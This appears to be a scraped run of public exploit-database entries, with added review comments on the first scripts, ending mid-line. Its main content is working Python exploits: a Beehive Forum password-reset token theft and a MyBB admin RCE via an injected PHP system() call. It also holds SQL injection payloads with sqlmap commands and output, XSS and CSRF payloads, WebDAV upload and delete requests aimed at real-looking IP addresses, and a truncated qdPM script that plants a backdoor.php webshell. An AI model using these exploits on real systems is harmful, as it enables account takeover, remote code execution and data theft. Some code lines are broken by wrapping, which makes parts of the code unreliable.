
# Exploit Title: Beehive Forum - Account Takeover
# Date:08/05/2022.
# Exploit Author: Pablo Santiago
# Vendor Homepage: https://www.beehiveforum.co.uk/
# Software Link: https://sourceforge.net/projects/beehiveforum/
# Version: 1.5.2
# Tested on: Kali Linux and Ubuntu 20.0.4
# CVE N/A
# PoC: https://imgur.com/a/hVlgpCg

# Vulnerability: In the "forgot password" functionality it is possible to
# modify the "Host" header, injecting a malicious host, which allows stealing the
# reset token and resetting a victim's password. (Requires user interaction.)

import requests
from bs4 import BeautifulSoup
import socket
import sys
import urllib.parse
import random
import string

# Positional CLI arguments: target host[:port], listener host, listener port.
# NOTE: no argument-count check; a missing argument raises IndexError here.
endpoint = sys.argv[1]
lhost = sys.argv[2]
lport = int(sys.argv[3])
# Value sent in the spoofed Host header (see the vulnerability note above):
# the forum presumably builds the reset link from it instead of from a
# configured base URL, which is the defect being demonstrated.
hostheader = f'{lhost}:{lport}'
# Plain http only; the scheme is not configurable.
url_forgot = f'http://{endpoint}/forum/forgot_pw.php'
url_change = f'http://{endpoint}/forum/change_pw.php'

def init_req():
    """Fetch the forgot-password page and return (hash_request, csrf_token, cookie).

    Returns the ``id`` and ``value`` attributes of the first ``<input>`` on the
    page (taken here to be the per-request CSRF field name and value) together
    with the ``sess_hash`` cookie the server set on this session.

    Raises:
        KeyError: if the response set no ``sess_hash`` cookie or the first
            ``<input>`` lacks an ``id``/``value`` attribute.
    """
    session = requests.Session()
    r = session.get(url_forgot)
    cookie = session.cookies.get_dict()
    cookie = cookie['sess_hash']
    # 'lxml' requires the lxml package to be installed alongside bs4.
    soup = BeautifulSoup(r.text, 'lxml')
    # soup.input is the *first* <input> element on the page; assumes that is
    # the CSRF field — TODO confirm against the target markup.
    hash_request = soup.input['id']
    csrf_token = soup.input['value']
    return hash_request, csrf_token, cookie

def forgot_req(hash_request: str, csrf_token: str, cookie: str):
    """Submit the forgot-password form with a spoofed ``Host`` header.

    ``hash_request``/``csrf_token`` are the CSRF field name and value and
    ``cookie`` the ``sess_hash`` value, all as returned by ``init_req``. If the
    response contains the "e-mail sent" banner, control passes to
    ``socket_req`` to wait for the victim's click. Returns None either way.
    """

    headers= {
        # The spoofed Host header is the core of the issue described in the
        # header comment: the reset link mailed to the victim presumably takes
        # its host from this header, so it points at the listener.
        'Host': hostheader,
        # NOTE(review): in this copy the User-Agent literal is split across two
        # lines by wrapping; it must be a single-line string to parse.
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0)
Gecko/20100101 Firefox/97.0',
        'Accept-Language': 'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3',
        'Cookie' : 'sess_hash=' + cookie
    }

    data = {
        hash_request : csrf_token,
        # Hard-coded forum webtag and target account name; neither is
        # configurable from the CLI.
        'webtag' : 'TEST',
        'logon' : 'admin',
        'request' : 'Request'
    }

    r = requests.post(url_forgot, headers=headers, data=data)
    # NOTE(review): this literal is also wrapped across two lines in this copy.
    if('You should shortly receive an e-mail containing instructions for
resetting your password' in r.text):
        print('')
        print('[*] A mail has been sent to the victim')
        socket_req()
    else:
        print('[*] The mail has not been sent')

def socket_req():
    """Listen once on (lhost, lport), read the incoming request and extract the token.

    Accepts a single TCP connection, reads up to 4096 bytes, takes the 13
    characters immediately preceding the first ``b" HTTP"`` (assumed to be the
    reset token at the end of the request path), URL-decodes them and hands
    them to ``change_pw``. Returns None.
    """

    print(f"[*] Listening on port {lport}...." )
    print('[*] Waitting the victim clicks in the malicious link\n')
    s = socket.socket()
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind((lhost, lport))
    s.listen()
    # Blocks until a client connects; only the first connection is handled and
    # neither socket is closed afterwards.
    (sock_c, _) = s.accept()
    # Single recv: assumes the whole request line fits in the first 4096 bytes.
    get_request = sock_c.recv(4096)
    # NOTE(review): the split literal below is wrapped across two lines in this
    # copy. The token is assumed to be exactly 13 characters — TODO confirm.
    # No HTTP response is sent back, so the victim's browser sees a hung request.
    user_token = urllib.parse.unquote_plus(get_request.split(b"
HTTP")[0][-13:].decode("UTF-8"))

    print("[*] Stole token: " + user_token)
    change_pw(user_token)

def change_pw(user_token: str):
    """Use the captured reset token to set a new random password on user id 1.

    ``user_token`` is the URL-decoded value captured by ``socket_req``. A fresh
    6-character alphanumeric password is generated, a new session/CSRF pair is
    obtained via ``init_req`` and the change-password form is posted. Returns
    None; the outcome is only printed.
    """
    c = string.ascii_letters + string.digits
    # random (not secrets) is used; fine for a throwaway value, never for real credentials.
    password = ''.join(random.choice(c) for _ in range(6))
    hash_request, csrf_token, cookie = init_req()
    headers= {
        # NOTE(review): User-Agent literal wrapped across two lines in this copy.
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0)
Gecko/20100101 Firefox/97.0',
        'Accept-Language': 'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3',
        'Cookie' : 'sess_hash=' + cookie
    }
    data = {
        hash_request : csrf_token,
        'webtag' : 'TEST',
        # Hard-coded user id; presumably the account named in forgot_req — not configurable.
        'u' : '1',
        'h' : user_token,
        'pw' : password,
        'cpw' : password,
        'save' : 'Save'
    }

    r = requests.post(url_change, headers=headers, data=data)
    if('Your password has been changed' in r.text):
        print(f'[*] The password has been changed to: {password}')

    else:
        # NOTE(review): this is the failure branch but it prints the same
        # "has been changed" message; it should report that nothing changed.
        print('[*] The password has been changed')


# Module-level entry point: there is no __main__ guard, so importing this file
# runs the whole flow (init_req -> forgot_req -> socket_req -> change_pw).
hash_request, csrf_token, cookie = init_req()
forgot_req(hash_request, csrf_token, cookie)
            
# Exploit Title: MyBB 1.8.29 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-05-08
# Exploit Author: Altelus
# Vendor Homepage: https://mybb.com/
# Software Link: https://github.com/mybb/mybb/releases/tag/mybb_1829
# Version: MyBB 1.8.29 
# Tested on: Linux
# CVE : CVE-2022-24734

# An RCE can be obtained on MyBB's Admin CP in Configuration -> Add New Setting. 
# The user must have a rights to add or update setting. This is tested on MyBB 1.8.29.
# The vulnerability may have existed as early as 1.4.0 since this 
# 'php' checking is introduced in 1.4.0 (https://github.com/mybb/mybb/security/advisories/GHSA-876v-gwgh-w57f) 

import requests
import argparse
import random
import string
from base64 import b64decode
from bs4 import BeautifulSoup


def login(username, password):
    """Authenticate to the Admin CP using the module-level ``r_client`` session.

    Posts the credentials to ``host + "/admin/index.php"``. If the response
    contains the invalid-credentials banner the process exits; otherwise the
    session cookies now carry the login and nothing is returned.
    """

    data = {
        "username" : username,
        "password" : password,
        "do" : "login"
    }

    # Success is inferred only from the absence of the failure banner.
    login_txt = r_client.post(host + "/admin/index.php", data=data).text

    if "The username and password combination you entered is invalid" in login_txt:
        print("[-] Login failure. Incorrect credentials supplied")
        # NOTE(review): exits with status 0 on failure; non-zero would be conventional.
        exit(0)

    print("[+] Login successful!")


def add_settings(cmd, raw_cmd=""):
    """Create a new Admin CP setting whose ``extra`` field carries a PHP payload.

    ``cmd`` is wrapped in ``system('... | base64 -w 0')`` so its output is
    base64-encoded; a non-empty ``raw_cmd`` is placed in ``system()`` verbatim
    instead. Returns the random setting name so ``get_cmd_result`` can find the
    row later. Exits the process on missing rights or a rejected form.

    Defender note: this leaves a persistent setting row (random 20-letter name,
    title "An innocent setting", type beginning with a tab) in the settings
    table — a usable indicator for detection and clean-up.
    """

    config_settings_txt = r_client.get(host + "/admin/index.php?module=config-settings&action=add").text

    if "Access Denied" in config_settings_txt:
        print("[-] Supplied user doesn't have the rights to add a setting")
        exit(0)

    print("[*] Adding a malicious settings...")

    soup = BeautifulSoup(config_settings_txt, "lxml")
    # my_post_key is MyBB's CSRF token for the form; IndexError if the form is absent.
    my_post_key = soup.find_all("input", {"name" : "my_post_key"})[0]['value']

    rand_string = get_rand_string()

    # Both variants close the surrounding PHP string literal, concatenate the
    # system() call and reopen the string.
    if raw_cmd != "":
        extra = "\" . system('{}') .\"".format(raw_cmd)
    else:
        extra = "\" . system('{} | base64 -w 0') .\"".format(cmd)

    data = {
        "my_post_key" : my_post_key,
        "title" : "An innocent setting",
        "description" : "An innocent description",
        "gid" : 1,
        "disporder" : "",
        "name" : rand_string,
        # Leading tab: presumably what evades the server-side check on the
        # 'php' type mentioned in the header (see the GHSA link) — TODO confirm.
        "type" : "\tphp",
        "extra" : extra,
        "value" : "An innocent value" 
    }

    post_setting = r_client.post(host + "/admin/index.php?module=config-settings&action=add",data=data,allow_redirects=False)

    # MyBB redirects (302) on success; anything else is treated as a form error.
    if post_setting.status_code != 302:
        soup = BeautifulSoup(post_setting.text, "lxml")
        # IndexError if no div.error is present in the non-302 response.
        error_txt = soup.find_all("div", {"class" : "error"})[0].text
        print("[-] Exploit didn't work. Reason: '{}'".format(error_txt))
        exit(0)

    print("[+] Malicious post settings accepted!")
    return rand_string

def get_rand_string(length=20):
    """Return ``length`` random ASCII letters (used as an unguessable setting name)."""
    alphabet = string.ascii_letters
    return "".join(random.choices(alphabet, k=length))

def get_cmd_result(ident_string, raw_cmd=""):
    """Print the command output rendered in the settings list for ``ident_string``.

    Loads the change-settings page, locates the table row whose id is
    ``row_setting_<ident_string>`` and reads the text of its first
    ``div.form_row``. Unless ``raw_cmd`` was used, the text (minus its first two
    characters) is base64-decoded. Returns None.

    Raises:
        IndexError: if the row or the form_row div cannot be found.
    """

    conf_settings_list = r_client.get(host + "/admin/index.php?module=config-settings&action=change").text

    soup = BeautifulSoup(conf_settings_list, "lxml")
    row_setting = soup.find_all("tr", {"id" : "row_setting_{}".format(ident_string)})[0]

    cmd_result = row_setting.find_all("div", {"class" : "form_row"})[0].text

    if raw_cmd == "":
        # [2:] drops two leading characters — presumably whitespace/newline
        # from the rendered cell; verify against the target markup.
        cmd_result = b64decode(cmd_result[2:]).decode()

    print("[+] Result: {}".format(str(cmd_result)))

# CLI definition and module-level driver (no __main__ guard: importing runs it).
parser = argparse.ArgumentParser()

parser.add_argument('--username', required=True, help="MyBB Admin CP username")
parser.add_argument('--password', required=True, help="MyBB Admin CP password")
parser.add_argument('--host', required=True, help="e.g. http://target.website.local, http://10.10.10.10, http://192.168.23.101:8000")
parser.add_argument('--cmd', required=False, help="Command to run")
parser.add_argument('--raw_cmd', required=False, help="Command to run directly into system()")
args = parser.parse_args()

username = args.username
password = args.password
# No trailing slash expected: the functions above append "/admin/...".
host = args.host

# Defaults when the optional flags are absent (style note: `is None` is the idiom).
cmd = "id" if args.cmd == None else args.cmd
raw_cmd = "" if args.raw_cmd == None else args.raw_cmd

# Shared session so the login cookies are reused by every later request.
r_client = requests.Session()

login(username, password)
ident_string = add_settings(cmd, raw_cmd=raw_cmd)
get_cmd_result(ident_string, raw_cmd=raw_cmd)
            
# Exploit Title: Joomla Plugin SexyPolling 2.1.7 - SQLi
# Google Dork: intext:"Powered by Sexy Polling"
# Date: 2022-02-08
# Exploit Author: Wolfgang Hotwagner
# Vendor Homepage: https://2glux.com/projects/sexypolling
# Software Link: https://2glux.com/downloads/files/free/sexypolling_pack_2.1.7_2glux.com.zip
# Version: all versions below version 2.1.8
# Tested on: Debian Bullseye




SexyPolling SQL Injection

====================

| Identifier: | AIT-SA-20220208-01|
| Target: | Sexy Polling ( Joomla Extension) |
| Vendor: | 2glux |
| Version: | all versions below version 2.1.8 |
| CVE: | Not yet |
| Accessibility: | Remote |
| Severity: | Critical |
| Author: | Wolfgang Hotwagner (AIT Austrian Institute of Technology) |


Summary

========

[Sexy Polling is a Joomla Extension for votes.](https://2glux.com/projects/sexypolling). In all versions below 2.1.8 an unauthenticated attacker could execute arbitrary SQL commands by sending crafted POST-parameters to poll.php.


Vulnerability Description

====================

In the vote.php file, the POST parameters min_date and max_date are insufficiently checked and sanitized. An attacker can use these parameters to send SQL injection payloads.

In lines 74 and 75 in the *site/vote.php* code, the parameters are assigned without being checked:

```
$min_date_sent = isset($_POST['min_date']) ? $_POST['min_date'].' 00:00:00' : '';
$max_date_sent = isset($_POST['max_date']) ? $_POST['max_date'].' 23:59:59' : '';
```

These are later used unfiltered by the WHERE clause:

```
$query_toal = "SELECT
COUNT(sv.`id_answer`) total_count,
MAX(sv.`date`) max_date,
MIN(sv.`date`) min_date
FROM
`#__sexy_votes` sv
JOIN
`#__sexy_answers` sa ON sa.id_poll = '$polling_id'
AND
sa.published = '1'
WHERE
sv.`id_answer` = sa.id";

//if dates are sent, add them to query
if ($min_date_sended != '' && $max_date_sended != '')
$query_toal .= " AND sv.`date` >= '$min_date_sended' AND sv.`date` <= '$max_date_sended' ";
```

Proof Of Concept

==============

To check a system for vulnerability, modify the POST request so that the min_date parameter contains a single apostrophe.

HTTP-Request:
```
POST /components/com_sexypolling/vote.php HTTP/1.1

Host: joomla-server.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
HTTP_X_REAL_IP: 1.1.1.1
Content-Length: 193
Origin: joomla-server.local
Connection: close
Referer: joomla-server.local/index.php/component/search/
Cookie: 3f7d6b4d84916c70a46aaf5501d04983=iuddgl57g75v5gruopdqh0cgd6

polling_id=1&answer_id[]=3&dateformat=digits&min_date=2021-12-07'&max_date=2021-12-14&country_name=-&country_code=-&city_name=-&region_name=-&voting_period=24&ae9a061e2170d406fb817b9ec0c42918=1
```

The HTTP response contains a MySQL error:

```
HTTP/1.1 500 Internal Server Error
Date: Wed, 15 Dec 2021 10:27:40 GMT
Server: Apache/2.4.41 (Ubuntu)
Set-Cookie: PHPSESSID=39p4ql2oj0b45opsf6p105tfcf; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: sexy_poll_1=1639564060; expires=Thu, 16-Dec-2021 10:27:40 GMT; Max-Age=86400; path=/
Content-Length: 4768
Connection: close
Content-Type: application/json

<!DOCTYPE html>
<html lang="en-gb" dir="ltr">
<head>
<meta charset="utf-8" />
<title>Error: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near &#039;00:00:00&#039; AND sv.`date` <= &#039;2021-12-14 23:59:59&#039;&#039; at line 12</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link href="https://fonts.googleapis.com/css?family=Open+Sans" rel="stylesheet" />
```

Vulnerable Versions
================
All versions below version 2.1.8

Tested Versions
=============
Sexy Polling ( Joomla Extension) 2.1.7

Impact
======
An unauthenticated attacker could inject and execute SQL commands on the database.

Mitigation
=========
Sexy Polling 2.1.8 fixed that issue

Vendor Contact Timeline
====================
| 2021-12-14 | Unable to find a contact of the vendor |
| 2021-12-15 | Contacting Joomla Security Strike Team |
| 2021-12-29 | Answer from the Joomla Security Strike Team that they will investigate the problem. |
| 2022-01-01 | Sexy Polling releases 2.1.8 |
| 2022-04-08 | Public Disclosure |

*We would like to note that the communication about this issue was weak. The contact-form of the maintainer of sexy_polling was broken and there was no other contact published. The Joomla Security Strike Team let us know that they will investigate, but they did not send any updates about the progress.*

Advisory URL
===========
[https://www.ait.ac.at/ait-sa-20220208-01-sexypolling](https://www.ait.ac.at/ait-sa-20220208-01-sexypolling)
            
# Exploit Title: WordPress Plugin stafflist 3.1.2 - SQLi (Authenticated)
# Date: 05-02-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/stafflist/
# Version: 3.1.2
# Tested on: Firefox
# Contact me: h [at] spidersilk.com

# Vulnerable Code:

$w = (isset($_GET['search']) && (string) trim($_GET['search'])!="" ?
...
	$where = ($w ? "WHERE LOWER(lastname) LIKE '%{$w}%' OR
			LOWER(firstname) LIKE '%{$w}%' OR
			LOWER(department)  LIKE '%{$w}%' OR
			LOWER(email) LIKE '%{$w}%'" : "");


# Vulnerable URL

http://localhost:10003/wp-admin/admin.php?page=stafflist&search=[SQLI]

# POC

```
sqlmap -u 'http://localhost:10003/wp-admin/admin.php?page=stafflist&search=test*'
--cookie="wordpress_cookies_paste_here"
```

# POC Image

https://prnt.sc/AECcFRHhe2ib
            
Exploit Title: WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF) Date: 2021-07-27 Exploit Author : WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF) Vendor Homepage : https://wpscan.com/plugin/blue-admi Version : <= 21.06.01 Tested on: windows 10 Professional CVE : CVE-2021-24581 <html> <body> <form action="http://example.com/wp-admin/admin.php?page=blue-admin&tab=blue_admin_login_page" method="POST" enctype="multipart/form-data"> <input type="hidden" name="ba_lp_attr[fm_bg_color]" value="FFFFFF" /> <input type="hidden" name="ba_lp_attr[fm_color]" value="777777" /> <input type="hidden" name="ba_lp_attr[logo_text]" value='WP"><script>alert(/XSS/)</script>' /> <input type="hidden" name="ba_lp_attr[logo_url]" value="https://example.com" /> <input type="hidden" name="ba_lp_attr[logo_img]" value="" /> <input type="hidden" name="ba_lp_attr[bg_color]" value="EEEEEE" /> <input type="hidden" name="ba_lp_attr[text_color]" value="222222" /> <input type="hidden" name="ba_lp_attr[bg_img]" value="" /> <input type="hidden" name="ba_lp_attr[bg_img_pos]" value="" /> <input type="hidden" name="ba_lp_attr[bg_img_rep]" value="" /> <input type="hidden" name="ba_lp_options_save" value="Save changes" /> <input type="submit" value="Submit request" /> </form> </body> </html>

TLR-2005KSH - Arbitrary File Upload

# Exploit Title: TLR-2005KSH - Arbitrary File Upload # Date: 2022-05-11 # Shodan Dork: title:"Login to TLR-2021" # Exploit Author: Ahmed Alroky # Author Company : Aiactive # Version: 1.0.0 # Vendor home page : http://telesquare.co.kr/ # Authentication Required: No # Tested on: Windows # CVE: CVE-2021-45428 # Vulnerability Description # Due to the Via WebDAV (Web Distributed Authoring and Versioning), # on the remote server,telesquare TLR-2021 allows unauthorized users to upload # any file(e.g. asp, aspx, cfm, html, jhtml, jsp, shtml) which causes # remote code execution as well. # Due to the WebDAV, it is possible to upload the arbitrary # file utilizing the PUT method. # Proof-of-Concept # Request PUT /l6f3jd6cbf.txt HTTP/1.1 Host: 223.62.114.233:8081<http://223.62.114.233:8081/> Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Connection: close Content-Length: 10

TLR-2005KSH - Arbitrary File Delete

# Exploit Title: TLR-2005KSH - Arbitrary File Delete # Date: 2022-05-11 # Exploit Author: Ahmed Alroky # Author Company : AIactive # Version: 1.0.0 # Vendor home page : http://telesquare.co.kr/ # Authentication Required: No # Tested on: Windows # CVE: CVE-2021-46424 # Proof-of-Concept # Request DELETE /cgi-bin/test2.txt HTTP/1.1 Host: 220.89.223.215:8083 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close
# Exploit Title: College Management System - 'course_code' SQL Injection (Authenticated) # Date: 2022-24-03 # Exploit Author: Eren Gozaydin # Vendor Homepage: https://code-projects.org/college-management-system-in-php-with-source-code/ # Software Link: https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f # Version: 1.0 # Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51 # CVE: CVE-2022-28079 # References: https://nvd.nist.gov/vuln/detail/CVE-2022-28079 ------------------------------------------------------------------------------------ 1. Description: ---------------------- College Management System 1.0 allows SQL Injection via parameter 'course_code' in /College-Management-System/admin/asign-single-student-subjects.php. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 2. Proof of Concept: ---------------------- In Burpsuite intercept the request from the affected page with 'course_code' parameter and save it like poc.txt Then run SQLmap to extract the data from the database: sqlmap -r poc.txt --dbms=mysql 3. Example payload: ---------------------- boolean-based blind Payload: submit=Press&roll_no=3&course_code=-6093' OR 2121=2121 AND 'ddQQ'='ddQQ 4. 
Burpsuite request: ---------------------- POST /College-Management-System/admin/asign-single-student-subjects.php HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-us,en;q=0.5 Cache-Control: no-cache Content-Length: 80 Content-Type: application/x-www-form-urlencoded Cookie: PHPSESSID=jhnlvntmv8q4gtgsof9l1f1hhe Referer: http://localhost/College-Management-System/admin/asign-single-student-subjects.php User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36 submit=Press&roll_no=3&course_code=Select+Course%27+OR+1%3d1+OR+%27ns%27%3d%27ns

T-Soft E-Commerce 4 - SQLi (Authenticated)

# Exploit Title: T-Soft E-Commerce 4 - SQLi (Authenticated) # Exploit Author: Alperen Ergel # Contact: @alpernae (IG/TW) # Software Homepage: https://www.tsoft.com.tr/ # Version : v4 # Tested on: Kali Linux # Category: WebApp # Google Dork: N/A # CVE: 2022-28132 # Date: 18.02.2022 ######## Description ########################################### # # # # Step-1: Login as Admin or with privilage user # Step-2: Open burp or zap and request the {PoC REQUEST PATH} vulnerable path # Step-3: Capture the request save as .txt # Step-4: Run SQLMAP with this command 'sqlmap -r {req.txt} --dbs --level 5 --risk 3 --tamper=space2comment' --random-agent' # Step-5: Now you're be able to see the dbs for more search 'how to use sqlmap advance' # # Impact: Attacker can see the what have in database and it's big impact and attacker can stole datas... # # # ######## Proof of Concept ######################################## ========>>> REQUEST <<<========= GET /Y/Moduller/_Urun/Json.php?_dc=1646232925144&sort=kayittarihi&dir=DESC&AramaKelimesi=&AramaKriteri=UrunAdi&SatisAlt=&SatisUst= &marka=&model=&tedarikci=&AlisAlt=&AlisUst=&KdvAlt=&KdvUst=&StokAlt=&StokUst=&birim=&extra=&kategori=&Kategori=&gor=0&ind=0&yeni=0&karsila=0&ana=0&grup=&firsat=0&mercek=0&kdvGoster=0&filtre=0&video=0&xml_not_update_price=0&xml_not_update_stock=0&multi_category_sort=0&simge=&desiAlt=&desiUst=&agirlikAlt=&agirlikUst=&stokBirim=&FirsatBaslamaTarihiBas=&FirsatBaslamaTarihiSon=&FirsatBitisTarihiBas=&FirsatBitisTarihiSon=&UrunEklemeTarihiBas=&UrunEklemeTarihiSon=&havaleAlt=&havaleUst=&page=1&start=0&limit=20 HTTP/2 Host: domain.com Cookie: lang=tr; v4=on; nocache=1; TSOFT_USER=xxx@xx.com; customDashboardMapping=true; countryCode=TR; rest1SupportUser=0; nocache=1; yayinlanmaDurumuPopup=1; yayinlanmaDurumuPopupTimeout=864000; PHPSESSID=fcfa85a5603de7b64bc08eaf68bc51ca; U_TYPE_CK=131; U_TYPE_OK=c16a5320fa475530d9583c34fd356ef5; TSOFT_LOGGED=7d025a34d0526c8896d713159b0d1ffe; email=; phone=; password= Sec-Ch-Ua: 
"(Not(A:Brand";v="8", "Chromium";v="98" X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36 Sec-Ch-Ua-Platform: "Linux" Accept: */* Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://domain.com/srv/admin/products/products-v2/index Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 =============> RESULTS OF THE SQLMAP <========================== Parameter: SatisAlt (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: _dc=1646232925144&sort=kayittarihi&dir=DESC&AramaKelimesi=&AramaKriteri=UrunAdi&SatisAlt=' AND 1331=1331 AND 'RcAU'='RcAU&SatisUst=&marka=&model=&tedarikci=&AlisAlt=&AlisUst=&KdvAlt=&KdvUst=&StokAlt=&StokUst=&birim=&extra=&kategori=&Kategori=&gor=0&ind=0&yeni=0&karsila=0&ana=0&grup=&firsat=0&mercek=0&kdvGoster=0&filtre=0&video=0&xml_not_update_price=0&xml_not_update_stock=0&multi_category_sort=0&simge=&desiAlt=&desiUst=&agirlikAlt=&agirlikUst=&stokBirim=&FirsatBaslamaTarihiBas=&FirsatBaslamaTarihiSon=&FirsatBitisTarihiBas=&FirsatBitisTarihiSon=&UrunEklemeTarihiBas=&UrunEklemeTarihiSon=&havaleAlt=&havaleUst=&page=1&start=0&limit=20 --- back-end DBMS: MySQL 5 available databases [2]: [*] d25082_db [*] information_schema [13:05:31] [INFO] GET parameter 'SatisAlt' appears to be 'SQLite > 2.0 OR time-based blind (heavy query)' injectable
# Exploit Title: Survey Sparrow Enterprise Survey Software 2022 - Stored Cross-Site Scripting (XSS) # Date: May 11 2022 # Exploit Author: Pankaj Kumar Thakur # Vendor Homepage: https://surveysparrow.com/ # Software Link: https://surveysparrow.com/enterprise-survey-software/ # Version: 2022 # Tested on: Windows # CVE : CVE-2022-29727 # References: https://www.tenable.com/cve/CVE-2022-29727 https://github.com/haxpunk1337/Enterprise-Survey-Software/blob/main/Enterprise-Survey-Software%202022 #POC For Stored XSS Visit https://LOCALHOST/login?test=Javascript%26colon;%252F%252F%E2%80%A9confirm?.(document.cookie)// XSS Executed

Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS)

# Exploit Title: Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS) # Exploit Author: Akshay Ravi # Vendor Homepage: https://github.com/star7th/showdoc # Software Link: https://github.com/star7th/showdoc/releases/tag/v2.10.3 # Version: <= 2.10.3 # Tested on: macOS Monterey # CVE : CVE-2022-0967 Description: Stored XSS via uploading file in .ofd format 1. Create a file with .ofd extension and add XSS Payload inside the file filename = "payload.ofd" payload = "<script>alert(1)</script>" 2. Login to showdoc v2.10.2 and go to file library Endpoint = "https://www.site.com/attachment/index" 3. Upload the payload on file library and click on the check button 4. The XSS payload will executed once we visited the URL

Contao 4.13.2 - Cross-Site Scripting (XSS)

# Exploit Title: Contao 4.13.2 - Cross-Site Scripting (XSS) # Google Dork: NA # Date: 04/28/2022 # Exploit Author: Chetanya Sharma @AggressiveUser # Vendor Homepage: https://contao.org/en/ # Software Link: https://github.com/contao/contao/releases/tag/4.13.2 # Version: [ 4.13.2 ] # Tested on: [KALI OS] # CVE : CVE-2022-1588 # References: - https://huntr.dev/bounties/df46e285-1b7f-403c-8f6c-8819e42deb80/ - https://github.com/contao/contao/security/advisories/GHSA-m8x6-6r63-qvj2 - https://contao.org/en/security-advisories/cross-site-scripting-via-canonical-url.html --------------- Steps to reproduce: Navigate to the below URL URL: https://localhost/contao/"><svg//onload=alert(112233)>

qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) (v2)

# Exploit Title: qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) # Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net # Date: 2021-08-03 # Original Exploit Author: Rishal Dwivedi (Loginsoft) # Original ExploitDB ID: 47954 (https://www.exploit-db.com/exploits/47954) # Exploit Author: Leon Trappett (thepcn3rd) # Vendor Homepage: http://qdpm.net/ # Software Link: http://qdpm.net/download-qdpm-free-project-management # Version: <=1.9.1 # Tested on: Ubuntu Server 20.04 (Python 3.9.2) # CVE : CVE-2020-7246 # Exploit written in Python 3.9.2 # Tested Environment - Ubuntu Server 20.04 LTS # Path Traversal + Remote Code Execution # Exploit modification: RedHatAugust #!/usr/bin/python3 import sys import requests from lxml import html from argparse import ArgumentParser session_requests = requests.session() def multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, uservar): request_1 = { 'sf_method': (None, 'put'), 'users[id]': (None, userid[-1]), 'users[photo_preview]': (None, uservar), 'users[_csrf_token]': (None, csrftoken_[-1]), 'users[name]': (None, username[-1]), 'users[new_password]': (None, ''), 'users[email]': (None, EMAIL), 'extra_fields[9]': (None, ''), 'users[remove_photo]': (None, '1'), } return request_1 def req(userid, username, csrftoken_, EMAIL, HOSTNAME): request_1 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, '.htaccess') new = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_1) request_2 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, '../.htaccess') new1 = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_2) request_3 = { 'sf_method': (None, 'put'), 'users[id]': (None, userid[-1]), 'users[photo_preview]': (None, ''), 'users[_csrf_token]': (None, csrftoken_[-1]), 'users[name]': (None, username[-1]), 'users[new_password]': (None, ''), 'users[email]': (None, EMAIL), 'extra_fields[9]': (None, ''), 'users[photo]': ('backdoor.php', '<?php if(isset($_REQUEST[\'cmd\'])){ 
